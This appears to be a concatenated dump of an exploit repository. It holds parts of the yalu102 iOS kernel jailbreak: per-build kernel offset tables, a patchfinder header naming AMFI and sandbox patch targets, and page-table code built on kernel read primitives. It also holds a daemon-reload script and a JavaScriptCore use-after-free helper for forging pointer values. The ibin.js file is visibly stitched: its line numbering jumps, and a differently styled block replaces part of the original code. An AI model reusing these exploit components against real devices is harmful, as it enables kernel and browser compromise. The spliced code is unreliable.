| rootvnode_offset = 0x5aa0b8; 84 | } 85 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X") == 0) { 86 | allproc_offset = 
0x5a4128; 87 | rootvnode_offset = 0x5aa0b8; 88 | } 89 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010") == 0) { 90 | allproc_offset = 0x5ec178; 91 | rootvnode_offset = 0x5f20b8; 92 | } 93 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001") == 0) { 94 | allproc_offset = 0x5b0228; 95 | rootvnode_offset = 0x5b60b8; 96 | } 97 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000") == 0) { 98 | allproc_offset = 0x5b0168; 99 | rootvnode_offset = 0x5b60b8; 100 | } 101 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000") == 0) { 102 | allproc_offset = 0x5a4148; 103 | rootvnode_offset = 0x5aa0b8; 104 | } 105 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X") == 0) { 106 | allproc_offset = 0x5a4128; 107 | rootvnode_offset = 0x5aa0b8; 108 | } 109 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X") == 0) { 110 | allproc_offset = 0x5a4128; 111 | rootvnode_offset = 0x5aa0b8; 112 | }//some beta ios 113 | else { 114 | printf("missing offset, prob crashing\n"); 115 | } 116 | } -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/offsets.h: -------------------------------------------------------------------------------- 1 | #ifndef offsets_h 2 | #define offsets_h 3 | 4 | #import 5 | 6 | // offsets from the main kernel 0xfeedfacf 7 | extern uint64_t allproc_offset; 8 | extern uint64_t kernproc_offset; 9 | 10 | // offsets in struct proc 11 | extern uint64_t struct_proc_p_pid_offset; 12 | extern uint64_t struct_proc_task_offset; 13 | extern 
uint64_t struct_proc_p_uthlist_offset; 14 | extern uint64_t struct_proc_p_ucred_offset; 15 | extern uint64_t struct_proc_p_comm_offset; 16 | 17 | // offsets in struct kauth_cred 18 | extern uint64_t struct_kauth_cred_cr_ref_offset; 19 | 20 | // offsets in struct uthread 21 | extern uint64_t struct_uthread_uu_ucred_offset; 22 | extern uint64_t struct_uthread_uu_list_offset; 23 | 24 | // offsets in struct task 25 | extern uint64_t struct_task_ref_count_offset; 26 | extern uint64_t struct_task_itk_space_offset; 27 | 28 | // offsets in struct ipc_space 29 | extern uint64_t struct_ipc_space_is_table_offset; 30 | 31 | // offsets in struct ipc_port 32 | extern uint64_t struct_ipc_port_ip_kobject_offset; 33 | 34 | void init_offsets(); 35 | extern uint64_t rootvnode_offset; 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/patchfinder64.h: -------------------------------------------------------------------------------- 1 | // 2 | // patchfinder64.h 3 | // 4 | // Created by qwertyoruiop on 21/09/16. 5 | // Copyright © 2016 qwertyoruiop. All rights reserved. 
6 | // 7 | 8 | #ifndef patchfinder64_h 9 | #define patchfinder64_h 10 | 11 | #import 12 | 13 | extern uint64_t text_exec_base; 14 | extern uint64_t text_exec_size; 15 | 16 | extern uint64_t prelink_exec_base; 17 | extern uint64_t prelink_exec_size; 18 | 19 | extern uint64_t whole_base; 20 | extern uint64_t whole_size; 21 | extern uint8_t* whole_dump; 22 | extern uint64_t find_register_value(uint32_t* opcodes, uint64_t offset, uint64_t opcode_base, uint8_t reg); 23 | extern uint64_t find_reference(uint32_t* opcodes, size_t opcode_size, uint64_t opcode_base, uint64_t target); 24 | enum Search { 25 | SearchTextExec, 26 | SearchPrelinkExec 27 | }; 28 | extern char uref; 29 | extern uint64_t get_data_for_mode(uint64_t offset, enum Search mode); 30 | 31 | 32 | 33 | void set_text_exec(uint64_t text_exec_base_,uint64_t text_exec_size_); 34 | void set_prelink_exec(uint64_t prelink_exec_base_, uint64_t prelink_exec_size_); 35 | void set_dump(uint64_t whole_base_,uint64_t whole_size_, uint8_t* whole_dump_); 36 | uint64_t find_kernel_pmap(); 37 | uint64_t find_gPhysBase(); 38 | uint64_t find_flushcache(); 39 | uint64_t find_amfi_memcmpstub(); 40 | uint64_t find_memwithphys(); 41 | uint64_t find_kernel_mount(); 42 | uint64_t find_vnode_lookup(); 43 | uint64_t find_cpu_list(); 44 | uint64_t find_cpacr_write(); 45 | uint64_t find_lwvm_mapio_patch(); 46 | uint64_t find_lwvm_mapio_newj(); 47 | uint64_t find_ret_non0(); 48 | uint64_t find_ret_0(); 49 | uint64_t find_amfiret(); 50 | uint64_t find_sbops(); 51 | #define CS_VALID 0x0000001 /* dynamically valid */ 52 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 53 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 54 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 55 | 56 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 57 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 58 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 59 | #define 
CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 60 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 61 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 62 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 63 | 64 | #define CS_ALLOWED_MACHO 0x00ffffe 65 | 66 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 67 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 68 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 69 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 70 | 71 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 72 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 73 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 74 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 75 | #endif /* patchfinder64_h */ 76 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/patchfinder64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/patchfinder64.o -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/pte_stuff.h: -------------------------------------------------------------------------------- 1 | #ifndef pte_stuff_h 2 | #define pte_stuff_h 3 | 4 | 5 | #define TTE_INDEX_SHIFT 3 6 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 7 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 8 | #define TTE_GET(tte, mask) (tte & mask) 9 | #define TTE_SETB(tte, mask) tte = tte | mask 10 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 11 | #define 
TTE_IS_VALID_MASK 0x1 12 | #define TTE_IS_TABLE_MASK 0x2 13 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 14 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 15 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 16 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 17 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 18 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 19 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 20 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 21 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 22 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 23 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 24 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 25 | #define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase) 26 | #define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase) 27 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 28 | 29 | typedef union VMA_4K { 30 | struct { 31 | uint64_t block_off : 12; 32 | uint64_t level3_index : 9; 33 | uint64_t level2_index : 9; 34 | uint64_t level1_index : 9; 35 | uint64_t level0_index : 9; 36 | uint64_t ttbr_selector : 16; 37 | } __attribute__((packed)) vm_info; 38 | uint64_t vmaddr; 39 | } VMA_4K; 40 | typedef union VMA_16K { 41 | struct { 42 | uint64_t block_off : 14; 43 | uint64_t level3_index : 11; 44 | uint64_t level2_index : 11; 45 | uint64_t level1_index : 11; 46 | uint64_t level0_index : 1; 47 | uint64_t ttbr_selector : 16; 48 | } __attribute__((packed)) vm_info; 49 | uint64_t vmaddr; 50 | } VMA_16K; 51 | 52 | VMA_16K vad16; 53 | VMA_4K vad4; 54 | char isvad = 0; 55 | 56 | #define TTELog NSLog 57 | vm_size_t sz = 0; 58 | 59 | void checkvad() { 60 | if (!sz) { 61 | struct utsname u = { 0 }; 62 | uname(&u); 63 | host_page_size(mach_host_self(), &sz); 64 | NSLog(@"checkvad: %x %x", sz, getpagesize()); 65 | if (strstr(u.machine, "iPad5,") == u.machine) { 66 | sz = 4096; // this is 4k but host_page_size lies to us 67 | } 68 | assert(sz); 69 | if (sz == 4096) { 70 | isvad = 1; 71 | } 72 | } 73 | } 74 | void parse_block_tte(uint64_t tte) { 75 | 
TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 76 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 77 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 78 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 79 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 80 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 81 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 82 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 83 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 84 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 85 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 86 | } 87 | 88 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 89 | 90 | checkvad(); 91 | if (!table) table = level1_table; 92 | if (!level) level = 1; 93 | 94 | vm_address_t tteaddr = 0; 95 | 96 | 97 | 98 | if (sz == 4096) { 99 | VMA_4K target_addr; 100 | target_addr.vmaddr = vmaddr; 101 | 102 | if (level == 1) { 103 | target_addr.vm_info.level1_index -= 0x1c0; 104 | } 105 | 106 | switch (level) { 107 | case 0: 108 | tteaddr = table + TTE_INDEX(target_addr, level0); 109 | break; 110 | case 1: 111 | tteaddr = table + TTE_INDEX(target_addr, level1); 112 | break; 113 | 114 | case 2: 115 | tteaddr = table + TTE_INDEX(target_addr, level2); 116 | break; 117 | 118 | case 3: 119 | tteaddr = table + TTE_INDEX(target_addr, level3); 120 | break; 121 | 122 | default: 123 | break; 124 | } 125 | 126 | } else if (sz == 4096*4) { 127 | VMA_16K target_addr; 128 | target_addr.vmaddr = vmaddr; 129 | 130 
| switch (level) { 131 | case 0: 132 | tteaddr = table + TTE_INDEX(target_addr, level0); 133 | break; 134 | case 1: 135 | tteaddr = table + TTE_INDEX(target_addr, level1); 136 | break; 137 | 138 | case 2: 139 | tteaddr = table + TTE_INDEX(target_addr, level2); 140 | break; 141 | 142 | case 3: 143 | tteaddr = table + TTE_INDEX(target_addr, level3); 144 | break; 145 | 146 | default: 147 | break; 148 | } 149 | 150 | 151 | } 152 | 153 | //parse_block_tte(level1_entry); 154 | 155 | pagestuff_64_callback(tteaddr, level); 156 | 157 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 158 | 159 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 160 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 161 | } 162 | } 163 | 164 | uint64_t findphys_real(uint64_t virtaddr) { 165 | __block uint64_t physvar = 0; 166 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) { 167 | uint64_t tte = ReadAnywhere64(tte_addr); 168 | if (addr == 3) {\ 169 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 170 | } 171 | }, level1_table, isvad ? 
1 : 2); 172 | 173 | return physvar; 174 | 175 | } 176 | uint64_t physalloc(uint64_t size) { 177 | uint64_t ret = 0; 178 | mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE); 179 | return ret; 180 | } 181 | 182 | #endif 183 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/reload: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ls /etc/rc.d | while read a; do /etc/rc.d/$a; done 3 | sleep 1 4 | launchctl unload $(ls /System/Library/LaunchDaemons/ | grep -v logd | grep -v fud | grep -v ReportCrash | while read a; do printf /System/Library/LaunchDaemons/$a\ ; done) 5 | launchctl unload /System/Library/NanoLaunchDaemons 6 | sleep 1 7 | launchctl load /Library/LaunchDaemons 8 | launchctl load /System/Library/LaunchDaemons 9 | launchctl load /System/Library/NanoLaunchDaemons 10 | 11 | exit 0 12 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/tar -------------------------------------------------------------------------------- /jsc_ConcatMemcpy_infoleak/ileak.html: -------------------------------------------------------------------------------- 1 | 168 | 169 | -------------------------------------------------------------------------------- /jsc_prop_enum_uaf/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2018 https://github.com/kudima 2 | 3 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 4 | 5 | 1. 
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 6 | 7 | 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 8 | 9 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 10 | -------------------------------------------------------------------------------- /jsc_prop_enum_uaf/ibin.js: -------------------------------------------------------------------------------- 1 | function Bin_Excpetion (message) { 2 | this.message = message; 3 | this.stack = (new Error()).stack; 4 | }; 5 | 6 | Bin_Excpetion.prototype = Object.create(Error.prototype); 7 | Bin_Excpetion.prototype.name = "BinHelper_Exception"; 8 | 9 | // f64 could be any value except NaN (0x7ff exponent and non zero mantissa) 10 | // in which case it is always encoded as 0x7ff8000000000000. 
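// We will throw when attempting to encode NaN to a 64-bit value.
//
// BinHelper is a small bit-casting helper: one 8-byte ArrayBuffer is viewed
// as f64 / u32 / u16 / u8 so the same bytes can be written as integer lanes
// and read back as a double (or the reverse). Every method reuses this one
// scratch buffer, so each call overwrites the state left by the previous one.
// Lane order follows the host byte order (u8[0] is the low byte of u32[0] on
// little-endian hosts) -- NOTE(review): big-endian hosts are assumed not to be
// a target, confirm if this ever matters.
var BinHelper = function () {
  this.buf = new ArrayBuffer(8);
  this.f64 = new Float64Array(this.buf);
  this.u32 = new Uint32Array(this.buf);
  this.u16 = new Uint16Array(this.buf);
  this.u8 = new Uint8Array(this.buf);
};

// Pack the first (up to) 8 char codes of `str` into the scratch buffer, low
// byte first, zero-filling the rest, and return the bytes as a double.
// Char codes above 0xff wrap modulo 256 on the Uint8Array store.
// Throws Bin_Excpetion when the resulting bit pattern is a NaN (see assertNaN).
BinHelper.prototype.asciiToAddr = function (str) {
  for (let i = 0; i < 8; i++) {
    this.u8[i] = i < str.length ? str.charCodeAt(i) : 0;
  }
  this.assertNaN();
  return this.f64[0];
};

// Same as asciiToAddr but sourced from an array-like of byte values.
// Missing trailing bytes are zero-filled; values wrap modulo 256.
// Throws Bin_Excpetion when the resulting bit pattern is a NaN.
BinHelper.prototype.uint8ArrToAddr = function (arr) {
  for (let i = 0; i < 8; i++) {
    this.u8[i] = i < arr.length ? arr[i] : 0;
  }
  this.assertNaN();
  return this.f64[0];
};

// Pack the first (up to) 4 byte values of `arr` into the low 32-bit lane
// (zero-filled) and return it as an unsigned 32-bit integer.
// No NaN check: only the low lane is written and an integer is returned.
BinHelper.prototype.uint8ArrToU32 = function (arr) {
  for (let i = 0; i < 4; i++) {
    this.u8[i] = i < arr.length ? arr[i] : 0;
  }
  return this.u32[0];
};

// Throw if the 8 bytes currently in the scratch buffer encode a NaN.
//
// IEEE-754 binary64: the value is NaN when all 11 exponent bits are set
// (bits 52..62, i.e. `hi & 0x7ff00000`) AND the 52-bit mantissa is non-zero.
// The mantissa spans the low 20 bits of `hi` plus all of `lo`, so both halves
// have to be inspected. The previous check only looked at `lo`, which let
// patterns such as 0x7ff80000_00000000 (the canonical quiet NaN) through as a
// NaN double instead of raising. Infinity (exponent all ones, mantissa zero)
// is a valid non-NaN value and is still accepted.
BinHelper.prototype.assertNaN = function () {
  const hi = this.u32[1];
  const lo = this.u32[0];
  // `hi & 0x7ff00000` masks out the sign bit, so +/-NaN are both caught.
  const exponentAllOnes = (hi & 0x7ff00000) === 0x7ff00000;
  const mantissaNonZero = (hi & 0x000fffff) !== 0 || lo !== 0;
  if (exponentAllOnes && mantissaNonZero) {
    throw new Bin_Excpetion("NaNs are not allowed");
  }
};

// Build a double from its two 32-bit halves (`hi` = bits 32..63, `lo` = bits
// 0..31). Throws Bin_Excpetion when (hi, lo) is a NaN bit pattern.
BinHelper.prototype.toF64 = function (hi, lo) {
  this.u32[1] = hi;
  this.u32[0] = lo;
  this.assertNaN();
  return this.f64[0];
};

// Variant of toF64 for values of 0x0001000000000000 or above that are meant
// to be stored as a property value: per the original author's note the
// engine applies an offset when boxing a double, so 0x10000 is subtracted
// from the high word here to compensate. `hi` below 0x10000 cannot be
// represented this way and raises Bin_Excpetion, as does a NaN pattern.
BinHelper.prototype.toF64JSValue = function (hi, lo) {
  if (hi < 0x10000) {
    throw new Bin_Excpetion("toF64JSValue failed hi < 0x10000");
  }
  this.u32[1] = hi - 0x10000;
  this.u32[0] = lo;
  this.assertNaN();
  return this.f64[0];
};
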
BinHelper.prototype.f64JSValue = function (ptr) { 94 | 95 | var hi = this.f64hi(ptr); 96 | var lo = this.f64lo(ptr); 97 | 98 | return this.toF64JSValue(hi, lo); 99 | } 100 | 101 | BinHelper.prototype.f64lo = function (f64) { 102 | this.f64[0] = f64; 103 | return this.u32[0]; 104 | } 105 | 106 | BinHelper.prototype.f64hi = function (f64) { 107 | this.f64[0] = f64; 108 | return this.u32[1]; 109 | } 110 | 111 | BinHelper.prototype.f64ToStr = function (f64) { 112 | 113 | this.f64[0] = f64; 114 | this.assertNaN(); 115 | 116 | var prefix = ''; 117 | let i = 24; 118 | 119 | if (this.u32[0] <= 0xfffffff) 120 | prefix += '0'; 121 | 122 | while ((this.u32[0] >> i) == 0) { 123 | i -= 4; 124 | prefix += '0'; 125 | if (i == 0) 126 | break; 127 | } 128 | 129 | return this.u32[1].toString(0x10) + prefix + this.u32[0].toString(0x10); 130 | } 131 | 132 | BinHelper.prototype.u16StrToUint8Array = function (str) { 133 | 134 | var bytes = new Uint8Array(str.length*2); 135 | 136 | for (var i=0; i> 8; 140 | } 141 | 142 | return bytes; 143 | } 144 | 145 | BinHelper.prototype.asciiToUint8Array = function (str) { 146 | 147 | var bytes = new Uint8Array(str.length); 148 | 149 | for (var i=0; i arr.byteLength) 184 | return -1; 185 | 186 | function atPos(pos) { 187 | for (let j=0; j arr.byteLength) 207 | return -1; 208 | 209 | function atPos(pos) { 210 | for (let j=0; j0; i--) { 220 | if (atPos(i)) 221 | return i; 222 | } 223 | 224 | return -1; 225 | } 226 | 227 | BinHelper.prototype.__lshiftF64 = function (shift) { 228 | 229 | this.u16[3] = this.u16[3] << shift; 230 | 231 | let extra = this.u16[2] & (0xffff << (16-shift)); 232 | extra = extra >> (16 - shift); 233 | this.u16[3] = this.u16[3] | extra; 234 | this.u16[2] = this.u16[2] << shift; 235 | 236 | extra = this.u16[1] & (0xffff << (16-shift)); 237 | extra = extra >> (16 - shift); 238 | this.u16[2] = this.u16[2] | extra; 239 | this.u16[1] = this.u16[1] << shift; 240 | 241 | extra = this.u16[0] & (0xffff << (16-shift)); 242 | extra = extra 
>> (16 - shift); 243 | this.u16[1] = this.u16[1] | extra; 244 | this.u16[0] = this.u16[0] << shift; 245 | } 246 | 247 | BinHelper.prototype.lshiftF64 = function (f64, shift) { 248 | 249 | this.f64[0] = f64; 250 | 251 | if (shift <= 16) { 252 | this.__lshiftF64(shift); 253 | return this.f64[0]; 254 | } 255 | 256 | while (shift > 16) { 257 | this.__lshiftF64(16); 258 | shift -= 16; 259 | } 260 | 261 | this.__lshiftF64(shift); 262 | 263 | return this.f64[0]; 264 | } 265 | 266 | 267 | BinHelper.prototype.f64OrLo = function(f64, mask) { 268 | this.f64[0] = f64; 269 | this.u32[0] |= mask; 270 | return this.f64[0]; 271 | } 272 | 273 | BinHelper.prototype.f64Xor = function (f1, f2) { 274 | 275 | var hi1 = this.f64hi(f1); 276 | var lo1 = this.f64lo(f1); 277 | 278 | var hi2 = this.f64hi(f2); 279 | var lo2 = this.f64lo(f2); 280 | 281 | return this.toF64(hi1 ^ hi2, lo1 ^ lo2); 282 | } 283 | 284 | let bh = new BinHelper(); 285 | 286 | // vim: tabstop=4:noexpandtab:shiftwidth=4 287 | --------------------------------------------------------------------------------